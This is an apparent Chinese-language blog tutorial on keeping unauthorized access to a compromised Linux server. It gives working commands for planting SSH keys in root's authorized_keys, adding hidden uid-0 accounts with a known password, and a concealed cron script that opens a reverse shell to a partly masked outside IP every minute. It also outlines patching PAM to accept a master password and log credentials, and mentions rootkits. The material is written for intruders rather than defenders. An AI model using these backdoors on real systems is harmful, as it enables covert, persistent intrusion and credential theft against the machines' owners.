前言

rookit后门

PAM后门

ssh公私钥免密登录

添加linux账户

计划任务

openssh后门万能密码

前言

上面我们讲了windows权限维持的方法 —> Windows权限维持方法，以及当我们拿到一台linux机器时，如何隐藏我们的踪迹 —> Linux权限维持—隐藏踪迹，这里我们讲述下如何植入后门来维持我们获取的权限。

rookit后门

介绍

Rootkit是一种特殊的恶意软件，它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息，比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。

rootkit是linux平台下最常见的一种木马后门工具，它主要是通过替换系统文件来达到入侵和隐藏的目的。rootkit主要分为文件级别的和内核级别的

文件级别：一般是通过程序漏洞或者系统漏洞进入系统后，通过修改系统的重要文件来达到隐藏自己的目的。在系统遭受rootkit攻击后，合法的文件被木马程序替代，变成了外壳程序，而其内部是隐藏着的后门程序。
内核级别：是比文件级rootkit更高级的一种入侵方式，它可以使攻击者获得对系统底层的完全控制权，此时攻击者可以修改系统内核，进而截获运行程序向内核提交的命令，并将其重定向到入侵者所选择的程序并运行此程序。

常用的rookit后门工具有Reptile、mafix

Reptile

Reptile是一款rookit后门工具。项目地址：GitHub - Reptile。使用方法可参考：Reptile 一款LKM Linux rootkit后门使用教程 - 3HACK

工具虽然很强大，但是该工具在新的linux下系统不能使用，由于内核问题。本人还觉得其设置过于复杂，连接需要填入的参数过多，并不方便使用。

PAM后门

PAM是一种认证模块，PAM可以作为Linux登录验证和各类基础服务的认证，简单来说就是一种用于Linux系统上的用户身份验证的机制。进行认证时首先确定是什么服务，然后加载相应的PAM的配置文件(位于/etc/pam.d)，最后调用认证文件(位于/lib/security)进行安全认证

简易利用的PAM后门也是通过修改PAM源码中认证的逻辑来达到权限维持

利用方法:

1、获取目标系统所使用的PAM版本，下载对应版本的pam版本
2、解压缩，修改pam_unix_auth.c文件，添加万能密码
3、编译安装PAM
4、编译完后的文件在：modules/pam_unix/.libs/pam_unix.so，复制到/lib64/security中进行替换，即可使用万能密码登陆，并将用户名密码记录到文件中。

参考：https://xz.aliyun.com/t/7902

ssh公私钥免密登录

创建秘钥对，然后将公钥上传到拿下的服务器中，实现root账号免密登录

1. 生成ssh秘钥对

ssh-keygen -t rsa

保存路径输入 ./id_rsa ，保存到当前路径。接着再按两次回车

2. 将id_rsa.pub公钥上传到服务中

3. 将公钥写入到authorized_keys文件中

mkdir /root/.ssh && touch /root/.ssh/authorized_keys
cat id_rsa.pub >> /root/.ssh/authorized_keys && chmod 600 /root/.ssh/authorized_keys && chmod 700 /root/.ssh/

4. 配置允许使用秘钥登录

vim /etc/ssh/sshd_config
RSAAuthentication yes
PubkeyAuthentication yes

5. ssh秘钥登录

ssh -i id_rsa root@192.168.110.131

成功实现秘钥登录

添加linux账户

目标：添加一个uid为0的账号，linux中超级管理员root的uid为0，这里我们再添加一个uid为0的账号

使用useradd添加

#添加账号test1，设置uid为0，密码为123456
useradd -p `openssl passwd -1 -salt 'salt' 123456` test1 -o -u 0 -g root -G root -s /bin/bash -d /home/test1

执行后则

#/etc/passwd
test1:x:0:0::/home/test1:/bin/bash
#/etc/shadow
test1:$1$salt$638tR8bROOvPnPklDQ9Vf/:19129:0:99999:7:::

远程连接，权限为root

直接写入/etc/passwd

1. 首先，使用perl语言（Linux自带）生成带有盐值的密码：

perl -le 'print crypt("123456","addedsalt")'

2. 添加test2账号，密码设置为123456

echo "test2:adrla7IBSfTZQ:0:0:root:/root:/bin/bash" >>/etc/passwd

计划任务

使用crontab命令进行反弹shell。crontab命令用于设置周期性被执行的指令。新建shell脚本，利用脚本进行反弹。

1. 创建反弹shell脚本，vim /etc/.evil.sh

#!/bin/bash
bash -i >& /dev/tcp/39.100.xx.xx/80  0>&1

并加上执行权限

chmod +x /etc/.evil.sh

2. 添加计划任务

我们可以使用crontab -e或者vim /etc/crontab添加计划任务

#添加计划任务
vim /etc/crontab
#查看计划任务
cat /etc/crontab

设置定时任务为每分钟执行一次

#每一分钟执行一次
*/1 * * * * root /etc/.evil.sh

3. 重启cron

service cron restart

然后就可以接收反弹shell

openssh后门万能密码

通过修改SSH源代码的方式来留一个万能的SSH密码。参考：SSH后门万能密码 - 墨鱼菜鸡 - 博客园

方法还有很多~~

相关文章：第4篇：Linux权限维持--后门篇 · 应急响应实战笔记

Linux权限维持—后门篇相关推荐

Linux权限维持之suid后门、ssh后门
文中主要讲解Linux权限维持中的小技巧,通过了解掌握SUID后门.SSH后门等方式,更快知晓权限维持作用.本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿 ...
linux nas解决方案_畅快玩转NAS 篇一：Linux权限简单讲解
畅快玩转NAS 篇一:Linux权限简单讲解 2020-01-22 19:02:28 35点赞 189收藏 8评论你是AMD Yes党?还是intel和NVIDIA的忠实簇拥呢?最新一届#装机大师赛 ...
Linux常用命令(本篇包括，Linux目录结构介绍、Linux Shell介绍、9个常见命令介绍、文件的概念、文件的操作（20个）、目录的操作、文件和目录的权限、文件压缩及解压缩)
Linux常用命令(本篇包括,Linux目录结构介绍.Linux Shell介绍.9个常见命令介绍.文件的概念.文件的操作(20个).目录的操作.文件和目录的权限.文件压缩及解压缩) ...
鸟哥的Linux私房菜(基础篇)- 第十四章、Linux 账号管理与 ACL 权限配置
第十四章.Linux账号管理与 ACL 权限配置最近升级日期:2009/09/09 要登陆 Linux 系统一定要有账号与口令才行,否则怎么登陆,您说是吧?不过,不同的使用者应该要拥有不同的权限才行 ...
看完这篇 Linux 权限后，通透了
我们在使用 Linux 的过程中,或多或少都会遇到一些关于使用者和群组的问题,比如最常见的你想要在某个路径下执行某个指令,会经常出现这个错误提示 . permission denied 反正我大概率见 ...
Linux权限不理解？看完这篇就够用了
Linux关于用户 Linux的用户分类 Linux用户的切换 su的使用扩展 sudo的使用 Linux权限的概念文件的的权限文件的后缀名文件权限更改文件权限 chmod chown ch ...
鸟哥的Linux私房菜(基础篇)- 第十七章、程序管理与 SELinux 初探
第十七章.程序管理与 SELinux初探最近升级日期:2009/09/11 一个程序被加载到内存当中运行,那么在内存内的那个数据就被称为程序(process).程序是操作系统上非常重要的概念,所有系 ...
后门怎么写隐蔽java_用Java写黑软－后门篇
这次我给大家带来的是<用Java写黑软-后门篇>,目前我在网上还没有找到哪位高手把自己写的java后门公布出来,有的也多是些恶搞的东西,所以这次我就来献献丑了. 先来一段理论的东西,后门, ...
python通用权限管理框架图_通用权限管理设计篇_设计模式
摘要: 本文讲的是通用权限管理设计篇_设计模式, 博客地址:http://www.blogjava.net/amigoxie/ 一．引言因为做过的一些系统的权限管理的功能虽然在逐步完 ...

Linux权限维持—后门篇

前言

rookit后门

PAM后门

ssh公私钥免密登录

添加linux账户

计划任务

openssh后门万能密码

Linux权限维持—后门篇相关推荐

最新文章

热门文章